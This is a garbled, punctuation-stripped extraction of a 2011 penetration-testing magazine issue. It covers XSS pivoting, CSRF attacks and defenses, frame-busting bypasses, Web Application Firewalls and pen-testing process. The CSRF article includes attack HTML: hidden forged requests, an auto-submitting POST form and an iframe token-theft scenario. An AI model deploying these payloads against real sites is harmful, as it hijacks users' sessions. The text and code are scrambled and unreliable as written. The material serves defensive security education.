Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
